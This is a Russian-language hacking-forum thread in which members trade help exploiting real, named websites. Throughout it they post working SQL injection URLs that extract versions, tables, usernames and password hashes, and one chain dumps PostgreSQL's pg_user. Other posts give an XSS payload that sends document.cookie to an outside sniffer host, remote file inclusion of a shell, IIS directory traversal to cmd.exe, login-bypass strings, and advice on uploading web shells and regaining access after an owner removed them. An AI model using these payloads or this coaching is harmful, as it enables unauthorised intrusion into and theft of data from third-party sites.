пробовал

не наказывайте если не в этом разделе надо писать

от сайта зависит, значь так он построен, что только по 1 штуке! ну это имхо исходя из моего опыта(

если там выводятся в цикле записи (к примеру все новости определенной категории) то естественно сможешь скорее всего вывести несколько записей. Если же идет выборка одной единственной записи и выводится его инфа как бы не в цикле.. а "единично" (глупо звучит, хз как назвать), то будет выводится все по 1 )

.....+limit+1250
limit принимает два параметра: limit n,m - где n - c какой позиции m - сколько строк вывести.(если не перепутал ))), а во-вторых вывести все сразу не получиться таким способом ибо размер поля, в которое ты выводишь не резиновое ))) можно все сразу вывести например в файл (но с такими правами недолго и полностью сдампить базу) или юзай разные тулзы для автоматизации эксплуатирования инъекции (можешь качнуть их в разделе Избранное этого форума)

+1 моё мнение подтвердилось - выход = искать еще уязвимости на том же сайте (часто бывает, что писал один и тот же человек и ошибки будут везде), где есть вывод инфы много раз, как в "цикле", например новости, список ссылок на материалы и тп, где много всего, как сказал блэки

лучше давай сайт, чтоб глянуть было можно

помогите с уязвимостью
хрень такая:
уязвимость то есть, узнал количество полей через Order By
а при вводе Union Select пустая страница
че мона сделать

помогите с уязвимостью
хрень такая:
уязвимость то есть, узнал количество полей через Order By
а при вводе Union Select пустая страница
че мона сделать

Присоединяюсь к вопросу. У самого такое частенько бывает, через order by находит количество полей, а через union select выводить ни в какую не хочет. Все варианты по замене пробела, комментария используются, но бестолку.

>> помогите с уязвимостью
хрень такая:
уязвимость то есть, узнал количество полей через Order By
а при вводе Union Select пустая страница
че мона сделать

Возможные причны:
1. Ветка мускуля ниже 4. (хотя вроде должен быть еррор)
2. Ты не поставил значение параметра в отрицательное/несуществующее значение
3. Отсутствует вывод

При случаях 1,3 тебе поможет посимвольный перебор. Если случай 2, то просто ставь значение параметра -9 или 99999999 например. А лучше сразу ссылки выкладывайте, тут телепатов нету.

Там получается скрипт который перехватывает ошибки
Пока ошибки нет данные выводит

Помогите разобраться
http://www.darim.kz/ru/catalog_items/1041'
не могу понять как поля подобрать
и тут
http://www.tornadoplus.kz/index.php?CID=-1

truelamer
http://www.darim.kz/ru/catalog_items/1041
а кто тибе сказал что здесь иньекция
может это обращение к папке 1041 в которой по умолчанию содержится index.html

truelamer
ну насчёт папок можешь кое-что посмотреть :D
_http://www.darim.kz/engine/
Вход свободный

По поводу второго- возможно два select

>> помогите с уязвимостью
хрень такая:
уязвимость то есть, узнал количество полей через Order By
а при вводе Union Select пустая страница
че мона сделать

может там фильтр на union и тп

В локалке запущен сайт типа: http://warcraft.ks.ua/?n=1"
при скане х-спайдером выдаёт: Серьезная уязвимость, SQL инъекция %s
Запрос для выполнения SQL инъекции:

http://warcraft.ks.ua/?n=1"

может кто подскажет пару запросов ? я совсем далёк именно от этого, с sql сталкивался совсем с обратной стороны ...
Заранее большое спасибо ...

В локалке запущен сайт типа: http://warcraft.ks.ua/?n=1"
при скане х-спайдером выдаёт: Серьезная уязвимость, SQL инъекция %s
Запрос для выполнения SQL инъекции:

http://warcraft.ks.ua/?n=1"

может кто подскажет пару запросов ? я совсем далёк именно от этого, с sql сталкивался совсем с обратной стороны ...
Заранее большое спасибо ...
посмотри количество колонок через order by, потом выводи эти колонки через union select

Пожалуйста, если можно - в примерах ...
Прочитал темы по sql inj на этом форуме, испробывал уже кучу вариантов ...
Но все результаты, которых я добился, это:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ...
и
Column count doesn't match value count at row 1
Есть и другие способы получить данные sql с этого сервера, но мне интересен именно этот способ ...
Никак не пойму: что я не правильно делаю ? Подскажите, пожалуйста ....
Заранее большое спасибо ...

YuxaS
Пойми, примеров слишком много они в статьях по sql,а судя по этому:
"Column count doesn't match value count at row 1"
Ты их плохо читал т.к. это имхо ошибка при записи, а ты даже не разобрался с таблицами куда-ж ты что писать собирался?

подскажите что дальше делать, на всех SQL <= 4-log
таблицы вручную попоббирал пока ничего.

http://www.dmdag.ru/partners2.php?id=1+union+select+1,version(),3,4,5, 6,7,8,9,10,11/*
http://www.05info.ru/showcnews.php?id=-1+union+select+1,user(),version(),4,5,6,7,8/*
http://www.color-it.net/news.php?id=1+union+select+1,2,3,4,5,6,7/*
http://megaspravka.org/viewcat.php?id=1+UNION+SELECT+1,version(),3,4,5,6, 7/*

перебирай дальше, пробуй стандарные типа user(s), admin(s), member(s), при желании можно брутфорсить )

У меня такой вопрос
Есть доступ к корневому каталогу для просмотра фойлов
в каких фойлах содержится самая важная инфа по серваку, ну типа файлов iis6.log
кроме файлов pwd

нашел скуль
http://site.net/index.php?menu=-1'
возвращает
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''-1''' at line 1
пробовал подобрать кол столбцов
-1' union select 1,2,3,4,5.../*
дошел до 300шт и всеравно пишет
The used SELECT statements have a different number of columns
потом через
order by
узнал что столбцов 8...
юзера, версию маськи, и БД узнал посимвольным перебором
версия MySQL 4
тоесть под запросов тама нету(((
что делать дальше я хз((((
помогите плиз

пришли куки
PHPSESSID=1njbt3ksf71o1118ibr5shi7t2
скажите даст ли чтонибудь их расшифровка?

это не кукисы, это сессия, не расшифруешь, т.к. рандомно генерится

что делать дальше я хз((((
помогите плизпопробуй проделать вышеописанные тобой действия с помощью sqltool (http://forum.antichat.ru/thread24918.html) и дальше TableName и FieldName Bruteforce

Меня всегда интересовал ворпос
а безопастно ли вот так проверять:
if($_SESSION['valid_user'])
{
// бла бла бла
}

и можно ли как-нить подменить эту переменную в сесии?

и как вообще правильно писать такую верификацию?

в принципе не возможно.. только в случае тупоумности программистом, если они сешн через экстракт прогоняют.. тогда в теории можно.. но лично не встречал

Помогите подобрать поля
http://www.logika.kz/index.php?p=news&order=&st=6

2 truelamer
Имхо инъекция в лимите ,да ещё после ORDER так-что врятли

http://www.kaznpu.kz/kz/?annons=-1+union+select+TABLE_NAME+from+INFORMATION_SCHEMA. TABLES+limit+20,1/*

выдало таблицу: moderator

Почему вот этот не проходит:
http://www.kaznpu.kz/kz/?annons=-1+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA .COLUMNS+where+TABLE_NAME=moderator+limit+0,1/*

table_name='moderator' или в hex

table_name='moderator' или в hex
Спасибо! +1

У меня такой вопрос:
База даных : Mssql.
Я пробывать зделать по этой стате :
http://forum.antichat.ru/thread30501-mssql.html

Первый этап прошол:
www.*****.com/?id=1'

Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near 'application'.

/index.asp, line 89

второй :
www.*****.com/?id=1'%20or%201=(select%20db_name())--

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the nvarchar value 'player' to a column of data type int.

/index.asp, line 89

третий:
www.****.com/?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMAT ION_SCHEMA.TABLES)--

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the nvarchar value 'points' to a column of data type int.

/index.asp, line 89

четвёртый:
www.*****.com/?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMAT ION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('points '))--

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the nvarchar value 'points' to a column of data type int.

/index.asp, line 89

Пятый:

И тут я застрял,надо:
id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATIO N_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('table1', 'table2',........,'table50'))--

Что то у меня не получилось и я получил:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near 'table1'.

/index.asp, line 89

Что мне дальше делать,или где моя ошибка?

Огромное спасибо!

Вы ,что господа сговорились? Посмотри на пост выше ,скорее всего та-же проблема.
Т.е. Hex

Выручайте.Нашел в сайте Apache , chunked encoding уязвимость.(если баян, ногами не пинать).Что нужно для взлома (эксплоит, или еще что то)?
Нашел в Seditio SQL инъекцию (2).Опятьже прошу дать ссылку, или обьяснить, как эту дырку использовать (на сайте и в поиске не нашел)...И еще : как исправить SQL инъекцию?

ВОпрост такое вообще взламывается?

Server Error in '/' Application.
Input string was not in a correct format.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.FormatException: Input string was not in a correct format.

Source Error:
An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.


Stack Trace:

[FormatException: Input string was not in a correct format.]
System.Number.ParseInt32(String s, NumberStyles style, NumberFormatInfo info) +0
System.Convert.ToInt32(String value) +47
ustu.subs.Page_Load(Object sender, EventArgs e) in \\snatch\c$\Inetpub\dynamic\ustu.ru\subs.ascx.cs:3 8
System.Web.UI.Control.OnLoad(EventArgs e) +67
System.Web.UI.Control.LoadRecursive() +35
System.Web.UI.Control.LoadRecursive() +98
System.Web.UI.Control.LoadRecursive() +98
System.Web.UI.Control.LoadRecursive() +98
System.Web.UI.Page.ProcessRequestMain() +750


Version Information: Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2407

народ подскажите неучу.
вот есть у меня скуль инекция как мне на индех.пхп повесить ифрейм или там сплойтег или че нить такое карочь изменить?
Никак. Тока если у тебя не инъекция через insert или update, затрагивающая, например, таблицу с новостями, выводящимися на главную
да я тут просто решил затроянить инет :D :D :D не знаю че делать на ФТП денег у менянету а другие способы загрузок я не знаю
не подскажеШЬ?КАК ЕЩЕ МОЖНО ИНСТАЛИТЬ

Никак. Тока если у тебя не инъекция через insert или update, затрагивающая, например, таблицу с новостями, выводящимися на главную

Выручайте.Нашел в сайте Apache , chunked encoding уязвимость.(если баян, ногами не пинать).
Ну если ты нашёл, то ты и должен знать что это за уязвимость и как её использовать.
Нашел в Seditio SQL инъекцию (2).Опятьже прошу дать ссылку, или обьяснить, как эту дырку использовать (на сайте и в поиске не нашел)...И еще : как исправить SQL инъекцию?[/QUOTE]
Опять же, если нашёл, то должен знать как использовать.
http://injection.rulezz.ru/

да я тут просто решил затроянить инет :D :D :D не знаю че делать на ФТП денег у менянету а другие способы загрузок я не знаю
не подскажеШЬ?КАК ЕЩЕ МОЖНО ИНСТАЛИТЬ
Иди лучше книжку почитай.

http://www.sports.kz/index.php?st=-1'

как юзать? что то ничего там не катит толи фильтры толи хз даже пробел затолкать не могу

2truelamer
ВОпрост такое вообще взламывается?

Server Error in '/' Application.
Input string was not in a correct format.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.FormatException: Input string was not in a correct format.

Source Error:
An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.


Stack Trace:

[FormatException: Input string was not in a correct format.]
System.Number.ParseInt32(String s, NumberStyles style, NumberFormatInfo info) +0
System.Convert.ToInt32(String value) +47
ustu.subs.Page_Load(Object sender, EventArgs e) in \\snatch\c$\Inetpub\dynamic\ustu.ru\subs.ascx.cs:3 8
System.Web.UI.Control.OnLoad(EventArgs e) +67
System.Web.UI.Control.LoadRecursive() +35
System.Web.UI.Control.LoadRecursive() +98
System.Web.UI.Control.LoadRecursive() +98
System.Web.UI.Control.LoadRecursive() +98
System.Web.UI.Page.ProcessRequestMain() +750


Version Information: Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2407
Енто ошибка в скрипте изпользовать можно только как раcкрытие пути !

http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,version(),null,4,null,null,null,null,null,null, null,null,null,null,null,null,null,null--

PostgreSQL 7.4.7 on i386-portbld-freebsd5.3, compiled by GCC cc (GCC) 3.4.2 [FreeBSD] 20040728

http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+1, TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8+from+information_schema.tables+--

выводит много интересного, но я выбрал pg_user

http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,COLUMN_NAME,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null+from+ information_schema.columns+where+table_name=(selec t+TABLE_NAME+from+information_schema.tables+limit+ 1+offset+43)--

результат:

usecatupd
usesuper
usecreatedb
usename
usesysid
passwd
valuntil
useconfig

http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,usename,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null+from+pg_u ser--

http://www.colan.ru/prices/level2n.php?id_group=99999999999999999+;+select+nu ll,passwd,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null+from+pg_us er--


первый это админ
login: postgres
pass: ********

Так вот вопрос по существу как пароли то вытащить, я пробовал даже тип поля помнять с hide что-то не могу... разьве что e-mail сменить и воспользоваться воостановлением пароля....

может пасс ********?

может пасс ********?

Нет, там у всех так пасс выглядит, а когда я запрос составил чтоб пароль в др ячейку копировать то база сказала что не может копировать поле hide в text
т.е. пароли имеют тип hide

2 truelamer
Ты просто неудачную таблицу выбрал. В ней нет паролей ,что-то типа файла passwd в unix
Если точнее, то системная таблица с информацией о юзерах
P.S но версия Piflit мне тоже понравилась :D

это тебе надо в pg_shadow лезть, но не факт что прав хватит

А точнее-факт ,что не хватит. Там куча других данных и возможностей,смотря какая цель

Цельбыла одна: научиться.

Всем спасибо, всем плюсую.

Скажите что такое выдает сканер NRG что за уязвимости такие или что это?
Найдено: http://XXX.kz/?PageServices
Найдено: http://XXX.kz/?wp-cs-dump
Найдено: http://XXX.kz/?wp-html-rend
Найдено: http://XXX.kz/?wp-stop-ver
Найдено: http://XXX.kz/?wp-uncheckout
Найдено: http://XXX.kz/?wp-usr-prop
Найдено: http://XXX.kz/?wp-ver-diff
Найдено: http://XXX.kz/?wp-verify-link
Найдено: http://XXX.kz/?wp-ver-info

перехожу по этим ссылкам ни чего не происходит

http://agrealt.ru/admin/
тут в админке sql я так понял что пароль пустое поле а login какой? что то там запросы не составляются или я что то не правильно делаю

Table 'realto_base.users' doesn't exist
=\

ага

SELECT user_id FROM realto_base.users WHERE LOWER(user_login)="1" or 1=1/*" AND LOWER(user_pwd)="c1562365960602e0b66d39995ec882cf";
Table 'realto_base.users' doesn't exist

сталобыть кто-то похерил админку, или админы кривые

Вем спасибо всем плюсую)))

ЗЫ: думал что туплю

Помогите разобраться есть ли тут пассивная XSS или нет, что ни пробую не получается
http://nkregion.kz/index.php?IDAdmin=test

Помогите разобраться есть ли тут пассивная XSS или нет, что ни пробую не получается
http://nkregion.kz/index.php?IDAdmin=test

Error!
CuteNews has detected that...
CuteNews там, врядли найдешь ХСС просто так.
Багтраки почитай лучше, или в сорцы лезь.

http://www.wingate.com/news.php?id=50'[/СODE]
вроде есть скуль запросы типа выдают одну и ту же страницу
[CODE]
http://www.wingate.com/news.php?id=50-1
http://www.wingate.com/news.php?id=49

а с подзапросами что то странное твориться не одни не выполняться O_o

как не выполняются?

http://www.wingate.com/news.php?id=49%20and%20(select%201)=1

5ый мускул
http://www.wingate.com/news.php?id=49%20and%20substring(version(),1,1)=5

Скажите что такое выдает сканер NRG что за уязвимости такие или что это?
Найдено: http://XXX.kz/?PageServices
Найдено: http://XXX.kz/?wp-cs-dump
Найдено: http://XXX.kz/?wp-html-rend
Найдено: http://XXX.kz/?wp-stop-ver
Найдено: http://XXX.kz/?wp-uncheckout
Найдено: http://XXX.kz/?wp-usr-prop
Найдено: http://XXX.kz/?wp-ver-diff
Найдено: http://XXX.kz/?wp-verify-link
Найдено: http://XXX.kz/?wp-ver-info

перехожу по этим ссылкам ни чего не происходит
это старые серверные уязвимости, не встречаются уже пару лет. даже не уязвимости, а фичи, показывающую инфу о серваке

ой блин серьезно выполняються :)видать сокс чет прогнал :) спасибо )

2 truelamer
на сайте есть намек на ХСС и даже возможно актив (хотя тут как посмотреть)
http://nkregion.kz/board/index.php?fid=3&id=18252
Кликни на "Отправить письмо автору" там откроется окошко в котором ник, половина его нормальная а половина уже после тега курсив. Дальше не рыл.... просто не успел :)

2 truelamer
http://nkregion.kz/board/index.php?fid=19КОД&id=52356

КОД '></title><SCRIPT>alert(/blabla/)</SCRIPT>


Блин, опера аж зависла никсовая от такого запроса (я серьёзно) :D

delete

Сниффер используй для перехвата данных.
Можешь использовать этот сниффер: http://system32.name/sniff/log.php

http://pogoda.mail.ru/?city=1301"><script>alert(document.cookie)</script>&extended=1

Простите, если боян))))
Работает и в Опере и в ИЕ)))
Но через сниффер не хочет передовать данные(( Почему?
Запрос подаю так: http://pogoda.mail.ru/?city=1301"><script>img = new Image(); img.src = "http://s.netsec.ru/plum.gif?"+document.cookie;</script>&extended=1

http://s.netsec.ru/plum.gif - Ссылка проверяна... просто так работает... А предовать дынные через mail не хочет((

Нашел на сайте уязвимости:

xss vulnerability : /lol/comment.php?entry=http://www.google.fr/webhp%3f<balisexss>%22%27
bad http code 404 /lol/?page=http://www.google.fr/webhp%3f<balisexss>%22%27&Submit=default

Что посоветуете?
ПОМОГИТЕ пожалуйста!!! :( :( :(

>> Что посоветуете?

Посоветую тебе не заёбывать людей логами с какого то сканера, а идти и почитать нормальные мануалы.

http://pogoda.mail.ru/?city=1301"><script>alert(document.cookie)</script>&extended=1

Простите, если боян))))
Работает и в Опере и в ИЕ)))
Но через сниффер не хочет передовать данные(( Почему?
Запрос подаю так: http://pogoda.mail.ru/?city=1301"><script>img = new Image(); img.src = "http://s.netsec.ru/plum.gif?"+document.cookie;</script>&extended=1

http://s.netsec.ru/plum.gif - Ссылка проверяна... просто так работает... А предовать дынные через mail не хочет((

2Tigger вот твоя проблема скажи честно ты в код страницы хоть заглядывал ?


a href="/?city=1301"><script>img = new Image(fuck)"><img src="/img/prjlogo_weather.gif" width=80

фильтр как видно отсюда проглатывает все что после ";" и закрывает тег а алет у тебя работал по тому что там ";" нету :) попробуй так

http://pogoda.mail.ru/?city=1301"><script>img = new Image()%3B img.src = "http://s.netsec.ru/plum.gif?"+document.cookie%3B </script>&extended=1

Помогите с проблемкой !
Вот есть сатик нашел SQL inj, но не могу подобрать таблицу может кто поможет
_http://www.restec.ru/exhibitions/featured/motoshow/getstand.ru.html?exhibs=-811+union+select+1/*
+ еще если не ошибаюсь есть PHP Inj, как это можно использовать ?
http://www.restec.ru/exhibitions/featured/motoshow/img/page.ru.html?http://www.sciam.com/media/inline/B3421824-EB0D-566A-0A231B2465213E50_1.jpg

Поправьте если где не прав ?

Заранее спасибо!

Snap, php-inj там нет имхо

2 Snap
А насчёт таблиц-ручками ,вот ссылка на дефолтные может пригодится?:
_http://forum.antichat.ru/showpost.php?p=465677&postcount=3
Удачи :)

http://www.xxx.xxx/includes/xxxx.asp?pg=1'
орет
Unclosed quotation mark before the character string '1''
скуль ?

2 MaSter GeN
90%

2 MaSter GeN
90%
собственно в чем закючаеться вопрос то :)
1'+OR+1=@@VERSION()--
орет ncorrect syntax near the keyword 'OR'
почему ? :) или енто кокраз оставшиеся 10% ;)

MaSter GeN, убери скобки, если не поможет, еще и ковычку убери
1+OR+1=@@VERSION--

Эта ошибка может возникнуть по 2 причинам :
1 инъекция-90%
2 кривые руки программера-10%
Т.к. вопрос изначально стоял так:"скуль?", я и дал 90%
Ну и разумеется если 1+or+1=@@version-- без скобок ,со скобкой,с одинарной кавычкой,с двойной кавычкой,без кавычки проходит то скуль :d
А вообще была-бы ссылка было-бы проще :d

http://video.antichat.ru/file98.html - в каких версиях работает? в каких форумах не пробую нигде не получается

осмелюсь предположить это за 2005 или 2006 год ;)

Видео снимается в основном для понимания основ :) а не для того чтоб ты смотрел и сразу хек :p

да конечно вот ссылка

http://www.nbc40.net/includes/pgstat.asp?pg=1'

и сдесь

http://www.nbc40.net/pages/newspix/newspix.asp?ID=10'

возможность залития шелла в папку аплоадс через вот сдесь :)

http://www.nbc40.net/pages/upload.php

ну и вообше на сервере дотупны к просмотрю все папки :)+раскрытие путей
но хотело бы добить скуль :)не с ковычками не без не со скобками не без не идет :)

Просканил сайтик Acunetix.Web.Vulnerability.Scanner сканером. Выдало Blind SQL/XPath injection.

View HTTP headers
Request
POST /index.php?page=uvod HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.site.ru
Content-Length: 134
Connection: Close
Pragma: no-cache
Acunetix-Product: WVS/5.5 (Acunetix Web Vulnerability Scanner - NORMAL)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm

username=111-222-1933email@address.tst&pass=111-222-1933email@address.tst'+%7C%7C+'ACUtwoACU&pass1=111-222-1933email@address.tst&b1=Ok

Как заюзать в этом случае инъекцию? Как использовать пост запрос на практике? Помогите новичку. Подробней если можна :)

ну про пост запросы если пользуешься лисой качаешьшь аддон на нее "tamper data"
включаешь и редактируешь заголовки и post!

ну про пост запросы если пользуешься лисой качаешьшь аддон на нее "tamper data"
включаешь и редактируешь заголовки и post!
urlparams удобнее

ну про пост запросы если пользуешься лисой качаешьшь аддон на нее "tamper data"
включаешь и редактируешь заголовки и post!
я прошу объяснить как это всё дело работает и как его применить на практике. Тоесть что и куда инжектится? Что подставить в запрос, чтоб добыть инфу. Примеры если можна.
p.s Типа http://site.ru/ITC/news.php?id=-773+union+select+1,version(),3,4,5/*

я прошу объяснить как это всё дело работает и как его применить на практике. Тоесть что и куда инжектится? Что подставить в запрос, чтоб добыть инфу. Примеры если можна.
p.s Типа http://site.ru/ITC/news.php?id=-773+union+select+1,version(),3,4,5/*
постучись в аську обьясню что бы тему не засорять !:) аська в профиле !
2Piflit ну енто кума как :) Я к temper привык :)

Люди, помогите с таким делом.
Залил шелл на сайт, на нём несколько сайтов.
у каждого сайта есть файл passwd,v, файл не пустой(до 1кб), но когда я пытаюсь его открыть мне пишет - File does not exists (/home/wmasta9/etc/сайт/passwd%2Cv)!

inlanger c урл кодировкой траблы. попробуй другой шелл.

мда про блинд иьекцию никто ничё не знает. а мож сканер врёт?

пошли два постзапроса и проверь. на ппример (поиграй с кавычкой и and/or)

POST /index.php?page=uvod HTTP/1.0

username=aqwerty&pass=11111' or 1=1/*&pass1=111111&b1=Ok

и

POST /index.php?page=uvod HTTP/1.0

username=aqwerty&pass=11111' or 2=1/*&pass1=111111&b1=Ok


и посмотри разные ли ответы сервера

пошли два постзапроса и проверь. на ппример (поиграй с кавычкой и and/or)

POST /index.php?page=uvod HTTP/1.0

username=aqwerty&pass=11111' or 1=1/*&pass1=111111&b1=Ok

и

POST /index.php?page=uvod HTTP/1.0

username=aqwerty&pass=11111' or 2=1/*&pass1=111111&b1=Ok


и посмотри разные ли ответы сервера


ответы одинаковы. страница отобрадается как и отображалась

4y4o, тогда скорее всего скули нет

лана проехали. но дайте понять смысл. если параметры не верны страница должна отобразится с ошибкой, если верны то без. это означает что скуль есть. так? дальнейшие действия?

4y4o дальше нужно подобрать количество полей
например

ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,6/*

можно задать больше 6 . и если на странице отобразится скажем цифра 4 то значит отобразилось значение 4 поля(самый простой метод)

можно так же подобрать количество полей (лично я так подбираю) с помощью оператора order by

например

ввв.сайт.ру/скрипт.пхп?переменная=1+order+b y+3/*
если ошибки нет то полей больше трёх или три
берём например больше
ввв.сайт.ру/скрипт.пхп?переменная=1+order+b y+10/*
если ошибка есть то полей меньше 10
и так короче находи цифру с которой ошибки небудет но следущая цифра должна отображать ошибку
скажем нашли количество полей например оно равно 6
дальше проверяеш стоит ли фильтрация на какиенибуть символы задаём команду скажем узнать версию майскула
ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,version(),7,8/*
если отобразилась версия то фильтрации нет если нет то попробуй закодировать эту команду скажем так
ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,aes_decrypt(aes_encrypt(con cat(version()),1),1),7,8/*
отобразилась версия. дальше нужно узнать в какой таблице лежат данные юзерей (можно с помощью брутфорса, надо бы написать мне такой а хотя уже есть наверно)
узнали например имя этой таблицы polzovateli
и выводим логин и пароль первого пользователя(он в большинстве случаев админ)

ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,5,concat(username,0x3a,password)+from+ polzovateli+limit+1,1/*

Вот запрос, судя по всему 3 таблицы :
http://city.ab.ru/index.php?pg=show&kat=-1+order+by+3/*
дальше
http://city.ab.ru/index.php?pg=show&kat=-1+union+select+1,2,3/*

You have an error in your SQL syntax near 'union select 1,2,3/*' at line 1

Копаем дальше... непонятно пока ничего

хех, версия мускла вроде как 3тья!!!!

что можно еще накопать ?

хех, версия мускла вроде как 3тья!!!!

что можно еще накопать ?

Файлы можешь читать, так что скрипт пиши, ищи полезные файлы и читай

http://city.ab.ru/index.php?pg=show&kat=12%20and%20ascii(substring(load_file(0x2F65746 32F706173737764),1,1))=35


больше ничего полезного имхо, т.к. кавычки экранируются

залил шелл на сайт через форму для загрузки изображений, но чтобы его залить пришлось расширение поменять на gif, а как php то теперь сделать? ((((
при переходе на изображение просто пустое окно огромного размера

попробуй в конце урл добавить %00
или залей как .php.gif

эхх нитак и нитак не получилось (((
после заливки там меняется название файла и поулчается то же самое blablabal.gif,
%00 тоже не помогло ( Всеравно спасибо

4y4o дальше нужно подобрать количество полей
например

ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,6/*

можно задать больше 6 . и если на странице отобразится скажем цифра 4 то значит отобразилось значение 4 поля(самый простой метод)

можно так же подобрать количество полей (лично я так подбираю) с помощью оператора order by

например

ввв.сайт.ру/скрипт.пхп?переменная=1+order+b y+3/*
если ошибки нет то полей больше трёх или три
берём например больше
ввв.сайт.ру/скрипт.пхп?переменная=1+order+b y+10/*
если ошибка есть то полей меньше 10
и так короче находи цифру с которой ошибки небудет но следущая цифра должна отображать ошибку
скажем нашли количество полей например оно равно 6
дальше проверяеш стоит ли фильтрация на какиенибуть символы задаём команду скажем узнать версию майскула
ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,version(),7,8/*
если отобразилась версия то фильтрации нет если нет то попробуй закодировать эту команду скажем так
ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,4,5,aes_decrypt(aes_encrypt(con cat(version()),1),1),7,8/*
отобразилась версия. дальше нужно узнать в какой таблице лежат данные юзерей (можно с помощью брутфорса, надо бы написать мне такой а хотя уже есть наверно)
узнали например имя этой таблицы polzovateli
и выводим логин и пароль первого пользователя(он в большинстве случаев админ)

ввв.сайт.ру/скрипт.пхп?переменная=1+union+s elect+1,2,3,5,concat(username,0x3a,password)+from+ polzovateli+limit+1,1/*


бред, если считать что у него скуль в авторизации. где оно по твоему выводить будет?
только посимвольный перебор

дядя blackybr шарит :). папсов видно издалека. Это ж не простая скуля. асю дашь?

Если в авторизации - попробуй что-нить из серии ' and 1=1/* '-- и т.п., т.е. закрываешь аргумент, дописываешь всегда верное условие или просто комментируешь остальной код. Ну это чтоб обойти авторизацию)

есть уязвимость на чтение файлов типа http://site.ru/?page=../../../../../../../../boot.ini. Гдето прочитал что таким способом можна заюзать cmd. Обьясните плз.

For example, a URL request which makes use of the scripts directory of IIS to traverse directories and execute a command can be:

http://server.com/scripts/..%5c../Windows/System32/
cmd.exe?/c+dir+c:\

The request would return to the user a list of all files in the C:\ directory by executing the cmd.exe command shell file and run the command "dir c:\" in the shell. The %5c expression that is in the URL request is a web server escape code which is used to represent normal characters. In this case %5c represents the character "\".

пробовал как написано не работает :(

Нашел сайт с sql инекцией. на сайте есть форум phpbb делаю запрос на вывод данных bla,bla+from+phpbb_users.. вообщем все как обычно но выводит данные другого phpbb. Ладно думаю я сервак один можно через другой форум тоже много чего на делать. но не могу найти сам адрес второго форума.. revers ip пока зывает еще неск сайтов но опять же нету там того форума... Как мне его найти уже пробовал в поисковиках icq,email полmзователей искать не помогло

4y4o, для начала надо убедица, что на удаленном серве стоит винда, а не никсы например. А потом подбирать путь до cmd.

m0use, попробуй inurl:tvoysite.com и смотри чего там проиндексировано. И ещё на archive.org посмотри старые версии сайта, мож там будут ссылки.

зайди вот сюда
http://madnet.name/tools/madss/
введи свой сайт и получиш список сайтов этого же сервака
Ну а там все понятно
и тем более -откуда ты уверен что сам форум под эту базу еще жив
может база от старого или еще че нить

n0ne там стоит винда и пусть к смд я подобрал. вопрос как эксплуатировать смд через вэб интерфейс. Windows/System32/cmd.exe?/c+dir+c:\ не работает. Я спросил есть ли ещё варианты читай внимательней.

есть уязвимость на чтение файлов типа http://site.ru/?page=../../../../../../../../boot.ini

Чтение еще не значит исполнение. Возможно, там только инклуд. Попробуй заюзать что-то типа
http://site.ru/?page=http://h4x0r.net/shell.php

Нашел сайт с sql инекцией. на сайте есть форум phpbb делаю запрос на вывод данных bla,bla+from+phpbb_users.. вообщем все как обычно но выводит данные другого phpbb. Ладно думаю я сервак один можно через другой форум тоже много чего на делать. но не могу найти сам адрес второго форума.. revers ip пока зывает еще неск сайтов но опять же нету там того форума... Как мне его найти уже пробовал в поисковиках icq,email полmзователей искать не помогло
Какая версия бд?

Что за тип хэша *02A4DF6067015EA7070ACE86D62DE48C0BCADA75?
Слил с mysql 4.1.22.

sha-1

в общем, описываю ситуацию с самого начала.

был доступ к серву посредсвам шела, потом поимел доступ к бд итд
когда холдер заметил мое появление удалил все шелы.
залил заново, но теперь шел не запускается (пробовал разные).
видимо чтото с обработкой пхп. При запросе к пхп файлам вылазит пустая страница(в сорсах- хтмл=боди-боди-хтмл)
остался доступ к админке- заливаю без проблем, но редактить нельзя.
с БД тоже самое- просто вылазит пустая страница (с других ипов не пускает, сам прописывал свой ип в конфигах)
к записи в админке разрешены следующие форматы
